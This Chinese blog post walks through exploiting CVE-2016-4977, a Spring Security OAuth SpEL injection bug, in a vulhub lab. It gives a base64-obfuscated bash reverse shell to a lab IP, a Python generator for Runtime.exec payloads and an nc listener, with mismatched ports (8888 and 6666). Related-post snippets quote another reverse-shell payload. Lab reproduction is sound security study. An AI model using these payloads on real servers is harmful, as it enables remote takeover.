vulhub spring 远程命令执行漏洞(CVE-2016-4977)

最新推荐文章于 2024-09-11 00:01:46 发布
最新推荐文章于 2024-09-11 00:01:46 发布
阅读量384 收藏 9
点赞数 2
文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81881972/article/details/142066719
版权

1.执行以下命令启动靶场环境并在浏览器访问

cd /vulhub/spring/CVE-2016-4977
 
docker-compose up -d
 
docker ps

2.输入以下命令测试环境

172.16.1.95:8080/oauth/authorize?response_type=${2*2}&client_id=acme&scope=openid&redirect_uri=http://test

输入默认口令admin:admin即可

3.反弹shell

构造payload

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS44OS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}

4.创建poc.py,下面内容写入

message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
   poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)

poc += ')}'
print(poc)

CVE-2016-4977目录中运行poc 输入生成的shell

5.开启监听,执行反弹

nc -lvvp 6666

6.复制poc生成的链接,仅替换${2*2}部分,保留后面的client_id部分

7.成功反弹,命令执行成功

你不要在理我了
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2016-4977) SpringSecurityOauth 远程命令执行
weixin_45253622的博客
12-10 1709
漏洞简介: Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块,其维护者发布了这样一个升级公告,主要说明在用户使用Whitelabel views来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令Spring Security OAuth 支持使用标准 SpringSpring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。在使用白标签视图进行错误处理时,
vulhubspringCVE-2016-4977漏洞复现
yougexiaojiuguan的博客
11-29 543
学习过程中的记录,方便以后查看。
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
qq_54713392的博客
05-08 782
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977漏洞原理: Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场...
漏洞复现----39、Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
七天
06-29 1257
Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
vulhub spring 远程命令执行漏洞CVE-2016-4977
2301_82061181的博客
09-08 474
步骤三:192.168.0.107:8080/oauth/authorize?cd /vulhub/spring/CVE-2016-4977#进入漏洞环境所在目录。复制poc生成的链接,仅替换${2*2}部分,保留后面的client_id部分。CVE-2016-4977目录中运行poc 输入生成的shell。步骤一:执行以下命令启动靶场环境并在浏览器访问。
CVE-2022-22965:Spring远程代码执行漏洞
热门推荐
一只爱吃橙子的羊
04-09 3万+
CVE-2022-22965:Spring Framework远程代码执行漏洞
Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
mole_exp的博客
02-22 5738
Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1341
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
Spring Cloud Gateway远程代码执行漏洞CVE-2022-22947)
初岄的博客
07-09 888
Spring Cloud Gateway远程代码执行漏洞CVE-2022-22947)
【安全漏洞SpringBoot + SpringSecurity CORS跨域资源共享配置
weixin_42925623的博客
09-05 1503
今天我们就来了解一下这个CROS漏洞,并记录一下在整合了springSecurity这一套安全框架下的springboot系统中如何在后端过滤器中通过正确注册WebMvcConfigurer bean来配置CORS的全局设置,实现对非白名单访问源的拦截。
SpringBoot总结
2302_77073236的博客
09-06 252
都做成图了,方便理解和掌握全局关系。
基于SpringBoot的多媒体信息共享平台开发
qq_45800365的博客
09-06 233
基于SpringBoot的多媒体信息共享平台开发,java项目。eclipse和idea都能打开运行。推荐环境配置:eclipse/idea jdk1.8 maven mysql前端技术:vue,Ajax,Json后端技术:SpringBoot,MyBatis本系统共分为两个角色:管理员和用户。主要功能有:后台:系统首页个人中心用户管理作品分类管理作品信息管理私聊信息管理系统管理前台:首页作品信息公告信息后台管理个人中心。
spring】微服务架构中的VO命名
突围
09-05 229
matchreqvo
Spring
weixin_69595694的博客
09-06 1398
5.2、编写配置文件bean-base.xml 5.3、编写测试 6、Spring下的IOC 6.0、创建对象的属性解析 6.1、创建无参的对象 6.2、创建带参数的对象 6.3、通过静态工厂创建对象 6.3.1、创建工厂类 6.3.2、编写描述 6.4、通过非静态工厂创建对象 6.4.1、创建工厂类 6.4.2、创建描述 7、Spring下的DI 7.1、通过Set注入(开发中使用的最多的一种) 7.1.1、编写UserService 7.1.2、编写
Java项目: 基于SpringBoot+mysql企业客户管理系统(含源码+数据库+答辩PPT+毕业论文)
weixin_43860634的博客
09-05 550
Java项目: 基于SpringBoot+mysql企业客户管理系统(含源码+数据库+答辩PPT+毕业论文)
JWT令牌技术解决spring博客项目的登录问题(三)
最新发布
2202_76101487的博客
09-11 456
本文写了使用jwt令牌技术完成用户的登录;
SpringBoot(JPA关联)
cuishujian_2003的博客
09-04 606
JPA多表查询多表查询在spring Data JPA 中有两种实现方式,第一种是创建一个结果集的接口来接收多表联接查询后的结果,第二种是利用JPA的关联映射来实现。
Pegasus内核漏洞CVE-2016-4655 & CVE-2016-4656分析与利用详解
"本文主要分析了Pegasus间谍软件利用的两个内核漏洞CVE-2016-4655和CVE-2016-4656,这两个漏洞影响了OSX 10.11.6和iOS 9.3.4版本。文章深入探讨了漏洞的原理和利用技术,特别是对OSUnserializeBinary的二进制反...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值